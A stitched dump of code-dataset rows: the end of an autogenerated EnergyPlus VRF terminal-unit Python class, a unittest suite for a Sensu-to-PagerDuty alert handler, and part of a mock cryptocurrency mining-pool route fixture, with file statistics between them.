ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_coil_object_name` or None if not set
"""
return self["Heating Coil Object Name"]
@heating_coil_object_name.setter
def heating_coil_object_name(self, value=None):
"""Corresponds to IDD field `Heating Coil Object Name`"""
self["Heating Coil Object Name"] = value
@property
def zone_terminal_unit_on_parasitic_electric_energy_use(self):
"""field `Zone Terminal Unit On Parasitic Electric Energy Use`
| Units: W
Args:
value (float): value for IDD Field `Zone Terminal Unit On Parasitic Electric Energy Use`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `zone_terminal_unit_on_parasitic_electric_energy_use` or None if not set
"""
return self["Zone Terminal Unit On Parasitic Electric Energy Use"]
@zone_terminal_unit_on_parasitic_electric_energy_use.setter
def zone_terminal_unit_on_parasitic_electric_energy_use(self, value=None):
"""Corresponds to IDD field `Zone Terminal Unit On Parasitic Electric
Energy Use`"""
self["Zone Terminal Unit On Parasitic Electric Energy Use"] = value
@property
def zone_terminal_unit_off_parasitic_electric_energy_use(self):
"""field `Zone Terminal Unit Off Parasitic Electric Energy Use`
| Units: W
Args:
value (float): value for IDD Field `Zone Terminal Unit Off Parasitic Electric Energy Use`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `zone_terminal_unit_off_parasitic_electric_energy_use` or None if not set
"""
return self["Zone Terminal Unit Off Parasitic Electric Energy Use"]
@zone_terminal_unit_off_parasitic_electric_energy_use.setter
def zone_terminal_unit_off_parasitic_electric_energy_use(self, value=None):
"""Corresponds to IDD field `Zone Terminal Unit Off Parasitic Electric
Energy Use`"""
self["Zone Terminal Unit Off Parasitic Electric Energy Use"] = value
@property
def rated_heating_capacity_sizing_ratio(self):
"""field `Rated Heating Capacity Sizing Ratio`
| If this terminal unit's heating coil is autosized, the heating capacity is sized
| to be equal to the cooling capacity multiplied by this sizing ratio.
| This input applies to the terminal unit heating coil and overrides the sizing
| ratio entered in the AirConditioner:VariableRefrigerantFlow object.
| Units: W/W
| Default value: 1.0
| value >= 1.0
Args:
value (float): value for IDD Field `Rated Heating Capacity Sizing Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `rated_heating_capacity_sizing_ratio` or None if not set
"""
return self["Rated Heating Capacity Sizing Ratio"]
@rated_heating_capacity_sizing_ratio.setter
def rated_heating_capacity_sizing_ratio(self, value=1.0):
"""Corresponds to IDD field `Rated Heating Capacity Sizing Ratio`"""
self["Rated Heating Capacity Sizing Ratio"] = value
@property
def availability_manager_list_name(self):
"""field `Availability Manager List Name`
| Enter the name of an AvailabilityManagerAssignmentList object.
Args:
value (str): value for IDD Field `Availability Manager List Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_manager_list_name` or None if not set
"""
return self["Availability Manager List Name"]
@availability_manager_list_name.setter
def availability_manager_list_name(self, value=None):
"""Corresponds to IDD field `Availability Manager List Name`"""
self["Availability Manager List Name"] = value
@property
def design_specification_zonehvac_sizing_object_name(self):
"""field `Design Specification ZoneHVAC Sizing Object Name`
| Enter the name of a DesignSpecificationZoneHVACSizing object.
Args:
value (str): value for IDD Field `Design Specification ZoneHVAC Sizing Object Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `design_specification_zonehvac_sizing_object_name` or None if not set
"""
return self["Design Specification ZoneHVAC Sizing Object Name"]
@design_specification_zonehvac_sizing_object_name.setter
def design_specification_zonehvac_sizing_object_name(self, value=None):
"""Corresponds to IDD field `Design Specification ZoneHVAC Sizing
Object Name`"""
self["Design Specification ZoneHVAC Sizing Object Name"] = value
| 42.061152
| 128
| 0.492846
| 41,926
| 436,763
| 5.010781
| 0.015074
| 0.030331
| 0.027437
| 0.023838
| 0.92393
| 0.877995
| 0.831161
| 0.797203
| 0.76771
| 0.734542
| 0
| 0.003812
| 0.430655
| 436,763
| 10,383
| 129
| 42.065203
| 0.841014
| 0.297152
| 0
| 0.747824
| 0
| 0
| 0.259436
| 0.042472
| 0
| 0
| 0
| 0
| 0
| 1
| 0.13288
| false
| 0
| 0.000637
| 0
| 0.206326
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
79518f1609f6098dd1f2e2111b4633405f5f70e1
| 23,187
|
py
|
Python
|
test/test_handler.py
|
Jazun713/sensu-plugin-py-pagerduty
|
88f2d53aa07c88c05d9a50b5c99cda5225ac1fec
|
[
"MIT"
] | null | null | null |
test/test_handler.py
|
Jazun713/sensu-plugin-py-pagerduty
|
88f2d53aa07c88c05d9a50b5c99cda5225ac1fec
|
[
"MIT"
] | 1
|
2018-08-07T20:46:41.000Z
|
2019-01-10T23:25:14.000Z
|
test/test_handler.py
|
Jazun713/sensu-plugin-py-pagerduty
|
88f2d53aa07c88c05d9a50b5c99cda5225ac1fec
|
[
"MIT"
] | null | null | null |
import mock
import unittest
import json, logging
import mock
from pagerduty.handler import PagerdutyHandler
def event_no_teams():
event = {'client': {
"name": "test_client",
"address": "127.0.0.1",
"keepalive": {
"handler": "sensu_deregister",
"thresholds": {
"critical": 604800,
"warning": 300
}
},
"metrics": {
"cpu": {
"crit": 100,
"warning": 90
},
"disk": {
"crit": 5,
"warning": 8
},
"memory": {
"crit": 100,
"warning": 90
}
},
"pools": {},
"services": {
"octopus-deploy": {
"service": "OctopusDeploy Tentacle"
}
},
"subscriptions": [
"win-svc-metrics",
"octopus-deploy-service",
"host-checks",
"host-metrics",
"client:test_client"
],
"version": "1.2.0",
"timestamp": 1529508402
}, 'check': {
"thresholds": {
"warning": 300,
"critical": 604800
},
"handler": "sensu_pagerduty",
"name": "keepalive",
"severity": "error",
"links": [{"href": "https://sensu.io", "text": "RunBook"}],
"output": "No keepalive sent from client for 1337 seconds (>=300)",
"status": 1,
"type": "standard",
"history": ["1", "1", "1"],
}}
event.update({
"occurrences": 3,
"action": "create",
})
return event
def settings_teams():
settings = {'pagerduty': {'api_key': 'default_key', 'svc_email': 'test@example.com',
'team_1': {'api_key': 'team_1_key'}, 'dynamic_description_prefix_key': 'name'}}
return settings
def settings_no_teams():
settings = {'pagerduty': {'api_key': 'default_key', 'svc_email': 'test@example.com',
'dynamic_description_prefix_key': 'name'}}
return settings
@mock.patch("pypd.EventV2.create")
@mock.patch("pagerduty.handler.PagerdutyHandler.grab_event")
@mock.patch("pagerduty.handler.PagerdutyHandler.grab_settings")
@mock.patch("sys.stdin")
class TestPagerdutyHandler(unittest.TestCase):
"""Test handle if handler config (settings) and event['client'] has pager_team"""
def test_handle_pager_team_client_and_settings(self, mock_stdin, mock_grab_settings, mock_grab_event,
mock_event_create):
settings = settings_teams()
event = event_no_teams()
event['client']['pager_team'] = 'team_1'
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'team_1_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client for 1337 seconds (>=300)',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': 'No keepalive sent from client for 1337 seconds (>=300)'
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
'''Test handle if handler config (settings) and event['check'] has pager_team'''
def test_handle_pager_team_check_and_settings(self, mock_stdin, mock_grab_settings, mock_grab_event,
mock_event_create):
settings = settings_teams()
event = event_no_teams()
event['check']['pager_team'] = 'team_1'
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'team_1_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client for 1337 seconds (>=300)',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': 'No keepalive sent from client for 1337 seconds (>=300)'
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
'''Test handle if handler config (settings) has pager_team but event does not'''
def test_handle_pager_team_settings_not_event(self, mock_stdin, mock_grab_settings, mock_grab_event,
mock_event_create):
settings = settings_teams()
event = event_no_teams()
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client for 1337 seconds (>=300)',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': 'No keepalive sent from client for 1337 seconds (>=300)'
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
'''Test handle if event['check'] has pager_team but handler config (settings) does not'''
def test_handle_pager_team_check_not_settings(self, mock_stdin, mock_grab_settings, mock_grab_event,
mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['pager_team'] = 'team_1'
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client for 1337 seconds (>=300)',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': 'No keepalive sent from client for 1337 seconds (>=300)'
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
'''Test handle if neither handler config (settings) or event has pager_team'''
def test_handle_pager_team_no_event_no_settings(self, mock_stdin, mock_grab_settings, mock_grab_event,
mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client for 1337 seconds (>=300)',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': 'No keepalive sent from client for 1337 seconds (>=300)'
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
'''Test handle if severity is not info, warning, critical, or error'''
def test_handle_severity_assert_fail(self, mock_stdin, mock_grab_settings, mock_grab_event, mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['severity'] = 'thingy'
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client for 1337 seconds (>=300)',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': 'No keepalive sent from client for 1337 seconds (>=300)'
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
'''Test handle if event['check']['severity'] is info'''
def test_handle_severity_info(self, mock_stdin, mock_grab_settings, mock_grab_event, mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['severity'] = 'info'
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client for 1337 seconds (>=300)',
'severity': 'info',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': 'No keepalive sent from client for 1337 seconds (>=300)'
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
'''Test handle if event['check']['severity'] is warning'''
def test_handle_severity_warning(self, mock_stdin, mock_grab_settings, mock_grab_event, mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['severity'] = 'warning'
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client for 1337 seconds (>=300)',
'severity': 'warning',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': 'No keepalive sent from client for 1337 seconds (>=300)'
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
'''Test handle if event['check']['severity'] is critical'''
def test_handle_severity_critical(self, mock_stdin, mock_grab_settings, mock_grab_event, mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['severity'] = 'critical'
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client for 1337 seconds (>=300)',
'severity': 'critical',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': 'No keepalive sent from client for 1337 seconds (>=300)'
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
'''Test handle if event['check']['severity'] is error'''
def test_handle_severity_error(self, mock_stdin, mock_grab_settings, mock_grab_event, mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['severity'] = 'error'
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client for 1337 seconds (>=300)',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': 'No keepalive sent from client for 1337 seconds (>=300)'
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
'''Test handle if output is a dictionary'''
def test_handle_output_dict_with_PD_context(self, mock_stdin, mock_grab_settings, mock_grab_event,
mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['output'] = {
'Summary': 'No keepalive sent from client',
'Details': 'No keepalive sent from client for 1337 seconds (>=300)',
'Status': 'Unable to authenticate with Salt to attempt restart. Restart not attempted Unable parse minions '
'name to attempt restart. Restart not attempted'
}
event['check']['pagerduty_contexts'] = ['This is a pd context', 'This is another pd context']
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': {
'Status': 'Unable to authenticate with Salt to attempt restart. Restart not attempted Unable parse '
'minions name to attempt restart. Restart not attempted',
'Contexts': ['This is a pd context', 'This is another pd context'],
'Details': 'No keepalive sent from client for 1337 seconds (>=300)'
}
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
def test_handle_output_dict_with_no_PD_context(self, mock_stdin, mock_grab_settings, mock_grab_event,
mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['output'] = {
'Summary': 'No keepalive sent from client',
'Details': 'No keepalive sent from client for 1337 seconds (>=300)',
'Status': 'Unable to authenticate with Salt to attempt restart. Restart not attempted Unable parse minions '
'name to attempt restart. Restart not attempted'
}
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': {
'Status': 'Unable to authenticate with Salt to attempt restart. Restart not attempted Unable parse '
'minions name to attempt restart. Restart not attempted',
'Details': 'No keepalive sent from client for 1337 seconds (>=300)'
}
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
def test_handle_output_no_status_no_PD_context(self, mock_stdin, mock_grab_settings, mock_grab_event,
mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['output'] = {
'Summary': 'No keepalive sent from client',
'Details': 'No keepalive sent from client for 1337 seconds (>=300)'
}
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': 'No keepalive sent from client for 1337 seconds (>=300)'
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
def test_handle_links_as_string(self, mock_stdin, mock_grab_settings, mock_grab_event, mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['output'] = {
'Summary': 'No keepalive sent from client',
'Details': 'No keepalive sent from client for 1337 seconds (>=300)',
'Status': 'Unable to authenticate with Salt to attempt restart. Restart not attempted Unable parse minions '
'name to attempt restart. Restart not attempted'
}
event['check']['pagerduty_contexts'] = ['This is a pd context', 'This is another pd context']
event['check']['links'] = 'https://sensu.io'
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': {
'Status': 'Unable to authenticate with Salt to attempt restart. Restart not attempted Unable parse '
'minions name to attempt restart. Restart not attempted',
'Contexts': ['This is a pd context', 'This is another pd context'],
'Details': 'No keepalive sent from client for 1337 seconds (>=300)'
}
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
def test_handle_links_as_list(self, mock_stdin, mock_grab_settings, mock_grab_event, mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['output'] = {
'Summary': 'No keepalive sent from client',
'Details': 'No keepalive sent from client for 1337 seconds (>=300)',
'Status': 'Unable to authenticate with Salt to attempt restart. Restart not attempted Unable parse minions '
'name to attempt restart. Restart not attempted'
}
event['check']['pagerduty_contexts'] = ['This is a pd context', 'This is another pd context']
event['check']['links'] = ['https://sensu.io', 'https://example.com']
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io"}, {"href": "https://example.com"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': {
'Status': 'Unable to authenticate with Salt to attempt restart. Restart not attempted Unable parse '
'minions name to attempt restart. Restart not attempted',
'Contexts': ['This is a pd context', 'This is another pd context'],
'Details': 'No keepalive sent from client for 1337 seconds (>=300)'
}
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
def test_handle_links_as_dict(self, mock_stdin, mock_grab_settings, mock_grab_event, mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['output'] = {
'Summary': 'No keepalive sent from client',
'Details': 'No keepalive sent from client for 1337 seconds (>=300)',
'Status': 'Unable to authenticate with Salt to attempt restart. Restart not attempted Unable parse minions '
'name to attempt restart. Restart not attempted'
}
event['check']['pagerduty_contexts'] = ['This is a pd context', 'This is another pd context']
event['check']['links'] = [{'href': 'https://sensu.io', 'text': 'Runbook'}]
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "Runbook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': {
'Status': 'Unable to authenticate with Salt to attempt restart. Restart not attempted Unable parse '
'minions name to attempt restart. Restart not attempted',
'Contexts': ['This is a pd context', 'This is another pd context'],
'Details': 'No keepalive sent from client for 1337 seconds (>=300)'
}
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
if __name__ == '__main__':
unittest.main()
| 38.073892
| 112
| 0.684133
| 2,908
| 23,187
| 5.229367
| 0.052957
| 0.038469
| 0.044387
| 0.056224
| 0.925363
| 0.918919
| 0.910041
| 0.896429
| 0.8865
| 0.8865
| 0
| 0.016047
| 0.169535
| 23,187
| 608
| 113
| 38.136513
| 0.773681
| 0.003235
| 0
| 0.807143
| 0
| 0
| 0.416927
| 0.040601
| 0
| 0
| 0
| 0
| 0.030357
| 1
| 0.033929
| false
| 0
| 0.008929
| 0
| 0.05
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7980595d4600e1efb7374b482179ffcfdab98a68
| 16,731
|
py
|
Python
|
test/apps/minermedic/resources/mining_pools/f2pool.py
|
holitics/minermedic
|
39dd03e58d665bea23f1e9c9ab134a794d092cb1
|
[
"Apache-2.0"
] | 2
|
2020-02-13T15:32:43.000Z
|
2020-04-08T04:10:10.000Z
|
test/apps/minermedic/resources/mining_pools/f2pool.py
|
alimogh/minermedic
|
39dd03e58d665bea23f1e9c9ab134a794d092cb1
|
[
"Apache-2.0"
] | 11
|
2019-11-23T00:20:23.000Z
|
2020-01-02T02:17:55.000Z
|
test/apps/minermedic/resources/mining_pools/f2pool.py
|
alimogh/minermedic
|
39dd03e58d665bea23f1e9c9ab134a794d092cb1
|
[
"Apache-2.0"
] | 2
|
2020-06-15T22:32:43.000Z
|
2020-07-17T18:40:58.000Z
|
routes = {
'/data/price?fsym=BTC&tsyms=USD': {'USD': 7500.22},
'/data/price?fsym=LTC&tsyms=USD' : {'USD': 46.80},
'/litecoin/holitics/001' : {"hashrate_history": {"2019-11-30T18:30:00Z": 171798692, "2019-11-30T18:40:00Z": 264856317, "2019-11-30T18:50:00Z": 193273528, "2019-11-30T19:00:00Z": 300647711, "2019-11-30T19:10:00Z": 207590086, "2019-11-30T19:20:00Z": 229064922, "2019-11-30T19:30:00Z": 272014595, "2019-11-30T19:40:00Z": 372230499, "2019-11-30T19:50:00Z": 272014595, "2019-11-30T20:00:00Z": 300647711, "2019-11-30T20:10:00Z": 200431807, "2019-11-30T20:20:00Z": 286331153, "2019-11-30T20:30:00Z": 229064922, "2019-11-30T20:40:00Z": 229064922, "2019-11-30T20:50:00Z": 314964268, "2019-11-30T21:00:00Z": 272014595, "2019-11-30T21:10:00Z": 229064922, "2019-11-30T21:20:00Z": 143165577, "2019-11-30T21:30:00Z": 164640413, "2019-11-30T21:40:00Z": 243381480, "2019-11-30T21:50:00Z": 114532461, "2019-11-30T22:00:00Z": 186115249, "2019-11-30T22:10:00Z": 171798692, "2019-11-30T22:20:00Z": 229064922, "2019-11-30T22:30:00Z": 293489432, "2019-11-30T22:40:00Z": 314964268, "2019-11-30T22:50:00Z": 214748365, "2019-11-30T23:00:00Z": 200431807, "2019-11-30T23:10:00Z": 257698038, "2019-11-30T23:20:00Z": 28633115, "2019-11-30T23:30:00Z": 0, "2019-11-30T23:40:00Z": 0, "2019-11-30T23:50:00Z": 0, "2019-12-01T00:00:00Z": 0, "2019-12-01T00:10:00Z": 0, "2019-12-01T00:20:00Z": 0, "2019-12-01T00:30:00Z": 0, "2019-12-01T00:40:00Z": 0, "2019-12-01T00:50:00Z": 0, "2019-12-01T01:00:00Z": 0, "2019-12-01T01:10:00Z": 0, "2019-12-01T01:20:00Z": 0, "2019-12-01T01:30:00Z": 0, "2019-12-01T01:40:00Z": 0, "2019-12-01T01:50:00Z": 0, "2019-12-01T02:00:00Z": 0, "2019-12-01T02:10:00Z": 0, "2019-12-01T02:20:00Z": 0, "2019-12-01T02:30:00Z": 0, "2019-12-01T02:40:00Z": 0, "2019-12-01T02:50:00Z": 0, "2019-12-01T03:00:00Z": 0, "2019-12-01T03:10:00Z": 0, "2019-12-01T03:20:00Z": 0, "2019-12-01T03:30:00Z": 0, "2019-12-01T03:40:00Z": 0, "2019-12-01T03:50:00Z": 0, "2019-12-01T04:00:00Z": 0, "2019-12-01T04:10:00Z": 0, "2019-12-01T04:20:00Z": 0, "2019-12-01T04:30:00Z": 0, "2019-12-01T04:40:00Z": 0, "2019-12-01T04:50:00Z": 0, "2019-12-01T05:00:00Z": 0, "2019-12-01T05:10:00Z": 0, "2019-12-01T05:20:00Z": 0, "2019-12-01T05:30:00Z": 0, "2019-12-01T05:40:00Z": 0, "2019-12-01T05:50:00Z": 0, "2019-12-01T06:00:00Z": 0, "2019-12-01T06:10:00Z": 0, "2019-12-01T06:20:00Z": 0, "2019-12-01T06:30:00Z": 0, "2019-12-01T06:40:00Z": 0, "2019-12-01T06:50:00Z": 0, "2019-12-01T07:00:00Z": 0, "2019-12-01T07:10:00Z": 0, "2019-12-01T07:20:00Z": 0, "2019-12-01T07:30:00Z": 0, "2019-12-01T07:40:00Z": 0, "2019-12-01T07:50:00Z": 0, "2019-12-01T08:00:00Z": 0, "2019-12-01T08:10:00Z": 0, "2019-12-01T08:20:00Z": 0, "2019-12-01T08:30:00Z": 0, "2019-12-01T08:40:00Z": 0, "2019-12-01T08:50:00Z": 0, "2019-12-01T09:00:00Z": 0, "2019-12-01T09:10:00Z": 0, "2019-12-01T09:20:00Z": 0, "2019-12-01T09:30:00Z": 0, "2019-12-01T09:40:00Z": 0, "2019-12-01T09:50:00Z": 0, "2019-12-01T10:00:00Z": 0, "2019-12-01T10:10:00Z": 0, "2019-12-01T10:20:00Z": 0, "2019-12-01T10:30:00Z": 0, "2019-12-01T10:40:00Z": 0, "2019-12-01T10:50:00Z": 0, "2019-12-01T11:00:00Z": 0, "2019-12-01T11:10:00Z": 0, "2019-12-01T11:20:00Z": 0, "2019-12-01T11:30:00Z": 0, "2019-12-01T11:40:00Z": 0, "2019-12-01T11:50:00Z": 0, "2019-12-01T12:00:00Z": 0, "2019-12-01T12:10:00Z": 0, "2019-12-01T12:20:00Z": 0, "2019-12-01T12:30:00Z": 0, "2019-12-01T12:40:00Z": 0, "2019-12-01T12:50:00Z": 0, "2019-12-01T13:00:00Z": 0, "2019-12-01T13:10:00Z": 0, "2019-12-01T13:20:00Z": 0, "2019-12-01T13:30:00Z": 0, "2019-12-01T13:40:00Z": 0, "2019-12-01T13:50:00Z": 0, "2019-12-01T14:00:00Z": 0, "2019-12-01T14:10:00Z": 0, "2019-12-01T14:20:00Z": 0, "2019-12-01T14:30:00Z": 0, "2019-12-01T14:40:00Z": 0, "2019-12-01T14:50:00Z": 0, "2019-12-01T15:00:00Z": 0, "2019-12-01T15:10:00Z": 0, "2019-12-01T15:20:00Z": 0, 